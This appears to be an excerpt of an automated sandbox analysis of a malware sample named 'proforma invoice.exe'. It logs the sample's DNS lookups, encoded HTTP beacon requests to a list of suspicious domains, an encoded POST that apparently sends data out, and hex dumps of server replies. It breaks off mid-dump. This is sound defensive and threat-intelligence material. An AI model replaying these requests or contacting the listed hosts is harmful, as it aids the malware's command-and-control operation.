            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00B1CE44
            Source: global trafficHTTP traffic detected: GET /w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?AZOTcfex=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&bB7L5=DPt0-rQpMXpt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?bB7L5=DPt0-rQpMXpt&AZOTcfex=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?bB7L5=DPt0-rQpMXpt&AZOTcfex=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?AZOTcfex=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&bB7L5=DPt0-rQpMXpt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /li0t/?bB7L5=DPt0-rQpMXpt&AZOTcfex=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ei85/?AZOTcfex=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aroo/?bB7L5=DPt0-rQpMXpt&AZOTcfex=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tf44/?AZOTcfex=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lfkn/?AZOTcfex=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&bB7L5=DPt0-rQpMXpt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.hprlz.cz
            Source: global trafficDNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global trafficDNS traffic detected: DNS query: www.hatercoin.online
            Source: global trafficDNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global trafficDNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global trafficDNS traffic detected: DNS query: www.tinmapco.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.anuts.top
            Source: global trafficDNS traffic detected: DNS query: www.telwisey.info
            Source: global trafficDNS traffic detected: DNS query: www.sandranoll.com
            Source: global trafficDNS traffic detected: DNS query: www.gipsytroya.com
            Source: global trafficDNS traffic detected: DNS query: www.helpers-lion.online
            Source: global trafficDNS traffic detected: DNS query: www.dmtxwuatbz.cc
            Source: unknownHTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: AZOTcfex=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 23 Aug 2024 02:18:43 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 23 Aug 2024 02:18:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 23 Aug 2024 02:18:48 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 23 Aug 2024 02:18:50 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:27:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:27:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:27:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:27:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:20:41 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 